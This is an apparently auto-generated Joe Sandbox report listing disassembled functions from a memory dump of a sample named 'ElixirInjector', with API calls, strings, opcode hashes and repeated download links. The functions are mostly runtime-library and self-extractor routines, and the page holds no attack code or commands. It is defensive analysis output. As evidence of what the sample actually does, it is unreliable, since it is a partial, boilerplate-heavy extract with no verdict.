Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: d93ddec8dd606b214b60015aea958572becf3ed0a44c53b95215f828b4e1c36a
Instruction ID: 93bb9164629414f2f467d4ce5496af5b35ecace461e42e044ac8b7fde7c284fa
Opcode Fuzzy Hash: d93ddec8dd606b214b60015aea958572becf3ed0a44c53b95215f828b4e1c36a
Instruction Fuzzy Hash: 5D412E71E10629ABC711DF64EC45BAEBBB8EB48720F10423AF805E7251D7349904E7A1

Function 00F1AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F1AF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 00F1AFCA
ROOT\CIMV2, xrefs: 00F1AF5C
WQL, xrefs: 00F1AFDC
Windows 10, xrefs: 00F1B0C2
Name, xrefs: 00F1B0B0

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: eef75c7a42b0824bef2fb82927140890c5368893f2a1f7037248991eb27f7622
Instruction ID: 34fba325fcb2a2ebfd978f778589ea3fd3c6b7ff1022d5df58e0d6c8981be6f0
Opcode Fuzzy Hash: eef75c7a42b0824bef2fb82927140890c5368893f2a1f7037248991eb27f7622
Instruction Fuzzy Hash: 8C717E75A00219EFDB14DFA4CC959AEBBB9FF49710B14015DE912A72A0CB70AE42EB50

Function 00F19382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00F19387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F193AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F193C9

Part of subcall function 00F1C29A: _wcslen.LIBCMT ref: 00F1C2A2

Part of subcall function 00F21FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00F1C116,00000000,.exe,?,?,00000800,?,?,?,00F28E3C), ref: 00F21FD1

_swprintf.LIBCMT ref: 00F19465

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

MoveFileW.KERNEL32(?,?), ref: 00F194D4
MoveFileW.KERNEL32(?,?), ref: 00F19514

Strings

rtmp%d, xrefs: 00F1944E

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: b6100f739c6a7556e6d73115462e750b627d7f40e74b9a1d0505d1133f38e877
Instruction ID: f29e8b49ddb8b653c177c60397a88558c9d27471e76047beb8b090d9eb84b4cd
Opcode Fuzzy Hash: b6100f739c6a7556e6d73115462e750b627d7f40e74b9a1d0505d1133f38e877
Instruction Fuzzy Hash: 4841A97190426866DF21EBA0CC65EDE737DAF55340F0448A5B609F3052EB7C8BC9EBA0

Function 00F21218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00F2122E

Part of subcall function 00F1B146: GetVersionExW.KERNEL32(?), ref: 00F1B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00F21251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00F21263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F21274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F21284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F21294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00F212CF
__aullrem.LIBCMT ref: 00F21379

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: bda79567c2eecb59eb5cf1c2be72336578992f8ca79e7e5c524336476d05d404
Instruction ID: b301ed0fc8c218887fda28495778bc230e2f556e7230259382ef2bfadb946891
Opcode Fuzzy Hash: bda79567c2eecb59eb5cf1c2be72336578992f8ca79e7e5c524336476d05d404
Instruction Fuzzy Hash: D04169B1908305AFC710DF65D88096BBBF9FF98314F00892EF996C2600E738E908DB51

Function 00F12210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00F12536

Part of subcall function 00F14092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F140A5

Part of subcall function 00F205DA: _wcslen.LIBCMT ref: 00F205E0

Strings

x%u, xrefs: 00F126FD
xc%u, xrefs: 00F1275A
;%u, xrefs: 00F12523

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: c31b6e53955c3f742b6e088e787c76beb40f6987f6823ea58c5e655446203f87
Instruction ID: 4e25023b4fcf0032c32967c0b1e50186492e51658246d38c5a4f23f84046df7e
Opcode Fuzzy Hash: c31b6e53955c3f742b6e088e787c76beb40f6987f6823ea58c5e655446203f87
Instruction Fuzzy Hash: 17F13A71A043809BDB25DBA4C8D5BFE77956F90310F08056DFC869B283CB689DC5E7A2

Function 00F29CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F29D0A

Strings

>, xrefs: 00F29D4B
</style>, xrefs: 00F29E52
<br>, xrefs: 00F29DFE
</p>, xrefs: 00F29DE8
<style>, xrefs: 00F29E30

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 48c815aaf94c9b0875fe766de27459e595d1462f82970d75d32600f40106bee5
Instruction ID: bb79ce8fe2d2ce952e8e33044382c235743ad7869b5a803adfb3bafcb6133836
Opcode Fuzzy Hash: 48c815aaf94c9b0875fe766de27459e595d1462f82970d75d32600f40106bee5
Instruction Fuzzy Hash: 54512866E0973291DB309A15BC2177673E0EFA1770F99041AFDC19B1C0FAE58C81B261

Function 00F3F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00F3FE02,00000000,00000000,00000000,00000000,00000000,00F3529F), ref: 00F3F6CF
__fassign.LIBCMT ref: 00F3F74A
__fassign.LIBCMT ref: 00F3F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00F3F78B
WriteFile.KERNEL32(?,00000000,00000000,00F3FE02,00000000,?,?,?,?,?,?,?,?,?,00F3FE02,00000000), ref: 00F3F7AA
WriteFile.KERNEL32(?,00000000,00000001,00F3FE02,00000000,?,?,?,?,?,?,?,?,?,00F3FE02,00000000), ref: 00F3F7E3

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 01fbe760782e9c255811200bb0e3d86532cc2b215338223cff08cd24c5fc0706
Instruction ID: 936f8740b01906f887beacb0922ed9d3be2f159faa268145f67d008c850b2173
Opcode Fuzzy Hash: 01fbe760782e9c255811200bb0e3d86532cc2b215338223cff08cd24c5fc0706
Instruction Fuzzy Hash: FE51E8B1D00209AFCB14CFA8DC41AEEBBF4FF09320F14416AE955E7251D770A944DBA0

Function 00F32900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00F32937
___except_validate_context_record.LIBVCRUNTIME ref: 00F3293F
_ValidateLocalCookies.LIBCMT ref: 00F329C8
__IsNonwritableInCurrentImage.LIBCMT ref: 00F329F3
_ValidateLocalCookies.LIBCMT ref: 00F32A48

Strings

csm, xrefs: 00F329DD

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6dc6295ac8e9b4102f90c44b454027e377161637a4e90a3be2a4c5c944ede15b
Instruction ID: f2e2e9780d03696436f88736776ae62ce8ade58feed4a16bdfc131d490be7f28
Opcode Fuzzy Hash: 6dc6295ac8e9b4102f90c44b454027e377161637a4e90a3be2a4c5c944ede15b
Instruction Fuzzy Hash: 0F418034E01218ABCF10DF68CC85A9EBBB5AF45334F148055E815AB392D779AA05EBA1

Function 00F29ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00F29EEE
GetWindowRect.USER32(?,00000000), ref: 00F29F44
ShowWindow.USER32(?,00000005,00000000), ref: 00F29FDB
SetWindowTextW.USER32(?,00000000), ref: 00F29FE3
ShowWindow.USER32(00000000,00000005), ref: 00F29FF9

Strings

RarHtmlClassName, xrefs: 00F29FA5

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b8050f09def865a1581ecf92ac47b161b55c46c1fc648e1baa48390479015d1d
Instruction ID: a9badee12779352d6a5fe7820fbc2608bbacfa8253af49cf26ce8b64ebd0289d
Opcode Fuzzy Hash: b8050f09def865a1581ecf92ac47b161b55c46c1fc648e1baa48390479015d1d
Instruction Fuzzy Hash: A141E632808324FFCB219F64EC48B5B7BA8FF48711F004559F8499A066CB74D954FB66

Function 00F29955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F2995E
_wcslen.LIBCMT ref: 00F29993

Strings

 , xrefs: 00F29A21
, xrefs: 00F299B0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00F29987
<br>, xrefs: 00F299DF

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 4c4bcff26b9cd01d8e680c4d38a0a1ced3ad8dae9b08da5adfb8ab33bb962bba
Instruction ID: 47d407b0f9fed181eb534e5c7fef8eee383b866c67997962f742dfc6dcf59a3c
Opcode Fuzzy Hash: 4c4bcff26b9cd01d8e680c4d38a0a1ced3ad8dae9b08da5adfb8ab33bb962bba
Instruction Fuzzy Hash: 67319232E4C31566D634EB54BC0277A73A4EB40330F50841FF88197280FBDCAD85A3A5

Function 00F3C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F3C868: _free.LIBCMT ref: 00F3C891

_free.LIBCMT ref: 00F3C8F2

Part of subcall function 00F38DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?), ref: 00F38DE2
Part of subcall function 00F38DCC: GetLastError.KERNEL32(?,?,00F3C896,?,00000000,?,00000000,?,00F3C8BD,?,00000007,?,?,00F3CCBA,?,?), ref: 00F38DF4

_free.LIBCMT ref: 00F3C8FD
_free.LIBCMT ref: 00F3C908
_free.LIBCMT ref: 00F3C95C
_free.LIBCMT ref: 00F3C967
_free.LIBCMT ref: 00F3C972
_free.LIBCMT ref: 00F3C97D

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 97aa5a202c2c4d4bbf5da57ad16864b1ee90f47d3694fa57b12aae30c84bf754
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 97112172580B04AAE520B7B1CC07FCB7BAC9F04B20F404C15B3DD76092DA7DB616A790

Function 00F2E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00F2E669,00F2E5CC,00F2E86D), ref: 00F2E605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F2E61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F2E630

Strings

AcquireSRWLockExclusive, xrefs: 00F2E615
KERNEL32.DLL, xrefs: 00F2E600
ReleaseSRWLockExclusive, xrefs: 00F2E625

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: fdb7fc599b842498eda5bbeada5b7e0c1624e1dbfa5bcb6fa006b7aa298faf25
Instruction ID: 98fc68fbc1f26a01e4ea66218245ae402480df1409fb10afbaf2e54ad0fdb0ab
Opcode Fuzzy Hash: fdb7fc599b842498eda5bbeada5b7e0c1624e1dbfa5bcb6fa006b7aa298faf25
Instruction Fuzzy Hash: 49F0F632FA02365F0F225FA9BC856B63EC8AA35B693340539DD05D7200EB14CC587BA2

Function 00F2146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00F214C2

Part of subcall function 00F1B146: GetVersionExW.KERNEL32(?), ref: 00F1B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F214E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00F21500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F21513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F21523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00F21533

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 890d99c91e66808b3d5ff761a0addd764c4634bb82efd8fb3d1d3fcfb6c9b16d
Instruction ID: cf5a07398b0340047e451419fceab57ddb8a191427af49632f4998f6f7235ed5
Opcode Fuzzy Hash: 890d99c91e66808b3d5ff761a0addd764c4634bb82efd8fb3d1d3fcfb6c9b16d
Instruction Fuzzy Hash: 7231F879508359ABC700DFA8D88599BB7F8FF98714F044A1EF999C3210E730D549CBA6

Function 00F32AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F32AF1,00F302FC,00F2FA34), ref: 00F32B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F32B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F32B2F
SetLastError.KERNEL32(00000000,00F32AF1,00F302FC,00F2FA34), ref: 00F32B81

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 42263f2e5aa3360709f27e0edcfc6651a002df8eef7b8d815ac48dbb1cfe2b2a
Instruction ID: 739e78891b2c1338cdb54e1bf67347dab411602f90700adaff25a5c8e9162f82
Opcode Fuzzy Hash: 42263f2e5aa3360709f27e0edcfc6651a002df8eef7b8d815ac48dbb1cfe2b2a
Instruction Fuzzy Hash: 2501F7365083196EA7542B787C85E2A7B59FFA27B5F700739F920550F0EF154C01B244

Function 00F397E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00F51098,00F34674,00F51098,?,?,00F340EF,?,?,00F51098), ref: 00F397E9
_free.LIBCMT ref: 00F3981C
_free.LIBCMT ref: 00F39844
SetLastError.KERNEL32(00000000,?,00F51098), ref: 00F39851
SetLastError.KERNEL32(00000000,?,00F51098), ref: 00F3985D
_abort.LIBCMT ref: 00F39863

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F55000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F72000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185906055.0000000000F73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f10000_ElixirInjector.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 4775cd485e0ba7e558f1c98b33545e4830db3d71aecf88b5836e69321653c2db
Instruction ID: 5418e53e22f9036dfb6ae02bb7ca60245b9bb7781cd655fc9c17d594aabd579f
Opcode Fuzzy Hash: 4775cd485e0ba7e558f1c98b33545e4830db3d71aecf88b5836e69321653c2db
Instruction Fuzzy Hash: B9F0C83A54860166C7523339BC0AB5B3A759FE3B75F740128FA28921D2FFE8C806B565

Function 00F2DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F2DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00F2DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F2DC72
TranslateMessage.USER32(?), ref: 00F2DC7C
DispatchMessageW.USER32(?), ref: 00F2DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00F2DC91

Memory Dump Source

Source File: 00000000.00000002.2185791998.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000000.00000002.2185776696.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185820340.0000000000F43000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2185843092.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
